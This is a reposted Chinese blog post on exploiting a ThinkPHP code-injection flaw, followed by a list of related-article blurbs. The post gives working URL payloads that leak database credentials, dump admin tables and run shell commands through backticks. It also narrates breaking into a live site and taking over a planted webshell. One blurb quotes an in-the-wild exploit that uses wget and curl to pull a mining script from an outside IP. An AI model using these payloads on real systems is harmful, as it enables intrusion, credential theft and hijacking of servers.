Thinkphp安全漏洞入侵 1

最新推荐文章于 2023-05-24 14:47:09 发布
最新推荐文章于 2023-05-24 14:47:09 发布
阅读量561 收藏
点赞数
CC 4.0 BY-SA版权
文章标签: php 数据库 shell
原文链接:http://www.cnblogs.com/mylxsw/archive/2012/05/18/ThinkPHP.html
本文探讨了ThinkPHP框架中一个未详细说明的漏洞利用方式,通过使用特定的URL参数,可以获取框架版本、数据库配置信息,甚至执行命令获取目录内容。并提供了利用该漏洞获取木马密码的实例,强调了合法使用的重要性。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

下面是来自sebug网站的漏洞信息:http://sebug.net/vuldb/ssvid-60054

 

 

不过该网站只是给了个测试的方法,并没有给出详细的入侵方式如:

通过使用 http://localhost/index.php/module/action/param1/$%7B@print(THINK_VERSION)%7D可以获取Thinkphp的版本号

 

 

下面是重点:

 

由此想到了一下可以利用的方式:

   /index.php/module/action/param1/$%7B@print(C(db_name))%7D

print(THINK_VERSION)中的THINK_VERSION常量替换,例如:

    使用C方法,获取数据库配置相关信息:C(DB_NAME)、C(DB_HOST)、C(DB_USER)、C(DB_PWD)

    使用D方法或者M方法,查询数据库,最典型的使用方式var_dump(D(Admin)->select()),能够查询出管理员信息,当然,表名需要猜一下,一般是admin,user等。

   其他PHP函数也是可以执行的。

另一种方式:

   利用PHP在“·”(Tab键上面的键,URL编码后为%60)之间的内容可以当做命令执行的方式,不管是windows还是Linux下,都可以执行cmd或者是Shell命令。

    例如:index.php/module/action/param1/$%7B@print(%60ls%60)%7D                         -------------Linux下

              index.php/module/action/param1/$%7B@print(%60dirls%60)%7D                     -------------Windows下

可以获取目录内容。

 

 

下面是入侵的几个实例图片:

 

 

 

查看到那个站已经被人入侵过了,还有几个木马,于是想办法获取木马密码。

 

通过使用`cat 木马文件名`,然后查看网页源代码,获取网马内容,本地使用base64以及gzinflate解密后获取网马密码,登陆成功。

 

 

 

 

 

仅供学习,请勿非法入侵~后果自负。O(∩_∩)O~

 

转载于:https://www.cnblogs.com/mylxsw/archive/2012/05/18/ThinkPHP.html

Thinkphp漏洞
weixin_43873557的博客
02-06 1144
Thinkphp介绍 ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,支持 windows/Unix/Linux等服务器环境。 ➢ Thinkphp应用 很多cms就是基于thinkphp二次开发的,所以thinkphp出问题的话,会影响很多基于thinkphp开发的网站。 ➢历史漏洞 ThinkPHP3.2.3_缓存函数设计缺陷可导致Getshell ThinkPHP5_SQL注入漏洞&&敏感信息泄露 ThinkPHP3.2.3_最新版update注入漏洞 Thin
Thinkphp最新版本漏洞分析
kali_Ma的博客
02-27 5011
环境 Thinkphp6.0.12LTS(目前最新版本); PHP7.3.4。 安装 composer create-project topthink/think tp6 测试代码 漏洞分析 漏洞起点不是__desturct就是__wakeup全局搜索下,起点在vendor\topthink\think-orm\src\Model.php 只要把this->lazySave设为True,就会调用了save方法。 【一>所有资源获取<一】 1、网络安全学习路线 2、电子书籍(白帽子
ThinkPHP开发框架曝安全漏洞,超过4.5万家中文网站受影响
mozhe_的博客
12-27 458
据外媒ZDNet报道,近期有超过4.5万家中文网站被发现容易遭到来自黑客的攻击,而导致这一安全风险出现的根源竟然是一个ThinkPHP漏洞。 报道称,有多家网络安全公司在近期都发现了针对运行着基于ThinkPHP的Web应用程序的服务器的扫描活动。ThinkPHP是一个快速、兼容而且简单的轻量级国产PHP开发框架,支持Windows/Unix/Linux等服务器环境,以及MySql、PgSQL、...
ThinkPHP漏洞合集(专注渗透视角)
热门推荐
LainWith的博客
04-11 1万+
服务框架是指某领域一类服务的可复用设计与不完整的实现,与软件框架不同的是,服务框架同时体现着面向服务,一个服务框架可以分为两个主要部分:服务引擎、引入的外部服务。ThinkPHP,是为了简化企业级应用开发和敏捷WEB应用开发而诞生的开源轻量级PHP框架。可想而知框架连接着网络和系统接触着越来越多的关键数据,渐渐成为单位公共安全中最具有战略性的资产,框架的安全稳定运行也直接决定着业务系统能否正常使用。
MSF复现Thinkphp漏洞
weixin_51151498的博客
02-09 534
MSF复现漏洞
ThinkPHP V5.0.5漏洞_漏洞一披露就被利用,LineageOS、Ghost 服务器遭黑客入侵
weixin_39957318的博客
10-21 335
4月30日,安全公司 F-Secure 的研究人员披露了SaltStack两个高危漏洞CVE-2020-11651 和 CVE-2020-11652。而黑客行动迅速,很快就利用该漏洞对 LineageOS、Ghost 和DigiCert 的服务器发起了攻击。LineageOS 是一个非常受欢迎的 Android 分支,基本是 CyanogenMod 的复刻。5月3日,LineageOS官...
thinkphp漏洞检测工具
06-06
然而,任何软件系统都可能存在安全漏洞ThinkPHP也不例外。为了保障Web应用的安全,开发者和安全专家们开发了一系列针对ThinkPHP的漏洞检测工具。本文将深入探讨这些工具的工作原理、使用方法及其在维护ThinkPHP...
thinkphp 一键漏洞检测
12-09
然而,如同所有软件一样,ThinkPHP也有可能存在安全漏洞,这些漏洞可能被恶意用户利用,对网站造成严重威胁。"thinkphp 一键漏洞检测"工具正是为了解决这个问题而设计的。 该工具适用于ThinkPHP框架的多个版本,从V...
thinkphp6文件写入漏洞
01-08
6. 定期更新:及时更新ThinkPHP框架至最新安全版本,修复已知的安全漏洞。 在实际开发中,开发者应遵循“最少权限原则”,即让每个组件或服务仅拥有完成其功能所需的最小权限,以降低攻击面。同时,配合使用防火墙...
thinkphp5漏洞验证
04-16
然而,如同任何复杂的软件系统一样,ThinkPHP5也可能存在安全漏洞。本文将深入探讨ThinkPHP5的一个常见漏洞,并提供验证方法,同时强调白帽子黑客行为的重要性以及如何防范此类安全风险。 ### 漏洞概述 在ThinkPHP...
记录一次基于ThinkPHP网站被入侵到溯源的过程
DYBOY-程序开发&网络安全
02-18 2837
昨天晚上,正准备入睡,朋友突然发消息说他的网站被黑客攻击了,首页内容被篡改,于是我开始了紧急的修复工作 知道这个情况后,立即翻身起来,让朋友发给我必要的信息,把网站的日志下载到本地,因为网站本身的访问量不是很大,所以直接使用 notepad++ 来手动分析。 0x01 下载必要文件 首先将日志文件、现在网站空间的源码以及之前的网站备份下载到本地,这一步是为了比较分析。 0x02 日志分析 从网...
Thinkphp漏洞详解合集
Aiwin的博客
05-24 4232
Thinkphp漏洞合集详细分析(未完成)
挖矿程序 入侵php,利用ThinkPHP漏洞下载并执行挖矿脚本
weixin_33173126的博客
03-17 1404
利用url如下:/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=cd%20/tmp;wget%20http://205.185.113.123/ex.sh;curl%20http://205.185.113.123...
关于网站被挂马ThinkPHP网站被劫持问题“define(‘Viv, bebegim.‘,‘Denzel-你的英雄‘)”
一个点的博客
08-21 4791
近日网站被挂马了,首页被恶意篡改,浏览器进入跳转菠菜页面,而且只要一个网站被挂马,基本一个服务器都无法幸免,所以觉得这些人为了流量不择手段非常可恨,但当自己深入了解并执行了木马文件之后,才发现,原来别人已经无比的宽容,手下留情,下面带大家看下那些挂马的人是怎么手下留情的,让你知道下挂马的危害与恐怖程度~~~废话不多说直接进入主题 一、挂马文件 网站被挂马最主要的表现就是首页被修改,黑客通过篡改首页文件并判断进入页面方式,从而截取用户流量,如:直接输入网址进入,看到的是被篡改后的首页静态html页面.
thinkphp恶意写入php代码,ThinkPHP任意代码执行漏洞复现
weixin_39941859的博客
04-08 369
ThinkPHP任意代码执行漏洞复现一、漏洞描述由于 ThinkPHP 框架对控制器名没有进行足够严格的检测,导致在没有开启强制路由的情况下,攻击者可以在服务端执行任意恶意代码。经过本地复现确认,攻击者仅仅通过一个 HTTP GET 请求,就可以完成漏洞的利用,执行任意代码。以执行 phpinfo() 为例。二、影响范围ThinkPHP 5.0.x < 5.0.23ThinkPHP 5.1....
thinkphp 实战记录1
groundhappy的专栏
05-23 240
模型 Model 一般内置的就够了。约定模型命名规则是去除表前缀的数据表名称使用首字母大写命名,然后加上Model 如果表前缀是 think_ 数据表名称是 think_user 不要前缀就是 user 加上Model以后就是UserModel 所以对应模型名称为UserModel 如果要自定义模型 继承Think/Model就可以 模型的实例化有四种方式 1 直接用new 比如要连接...
thinkphp恶意写入php代码,漏洞报告 | ThinkPHP配置不当可导致远程代码执行
weixin_30653101的博客
04-08 556
ThinkPHP配置不当可导致远程代码执行漏洞分析报告1. 漏洞描述ThinkPHP是一款国内流行的开源PHP框架,近日被爆出存在可能的远程代码执行漏洞,攻击者可向缓存文件内写入PHP代码,导致远程代码执行。虽然该漏洞利用需要有几个前提条件,但鉴于国内使用ThinkPHP框架的站点数量之多,该漏洞还是存在一定的影响范围。2. 漏洞危害攻击者可通过该漏洞获取网站的控制权限,可修改页面,导致数据泄漏等...
入侵php网站后台管理系统,caozha-admin(PHP网站后台管理框架)
weixin_31632707的博客
04-06 1232
caozha-admin是一个通用的PHP网站后台管理框架,基于开源的ThinkPHP开发,特点:易上手,零门槛,界面清爽极简,极便于二次开发。基础功能1、系统设置2、管理员管理3、权限组管理4、系统日志5、后台功能地图6、整合了百度UEditor等各种常用插件,可去演示页面查看调用。7、无限级别分类8、文章管理系统9、用户(会员)管理系统10、评论系统(支持盖楼评论,支持设置屏蔽词、验证码、是否...
入侵方法与手段
LISTONE的个人博客
05-29 1291
入侵方法与手段 黑客入侵模型与原理 漏洞扫描 口令破解 拒绝服务攻击 缓冲区溢出攻击 格式化字符串攻击 跨站脚本攻击 SQL Injection攻击 黑客入侵步骤 常见安全威胁 口令破解 拒绝服务(DoS)攻击 缓冲区溢出攻击 格式化字符串攻击 特洛伊木马 网络监听等等 主要入侵攻击方法 主机渗透攻击方法 口令破解 漏洞攻击 特洛伊木马攻击 网络攻击方法 拒绝服务攻击 IP地址欺骗 网络监听 其他攻击方法
ThinkPHP5漏洞利用工具:一键获取Shell
ThinkPHP是一个在中国广泛使用且非常流行的PHP框架,而其版本5中的一个严重的安全漏洞使得攻击者可以在网站服务器上执行任意代码,这个漏洞被编号为CVE-2018-20062。本次提供的工具包中包含两个利用程序和一个原理...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值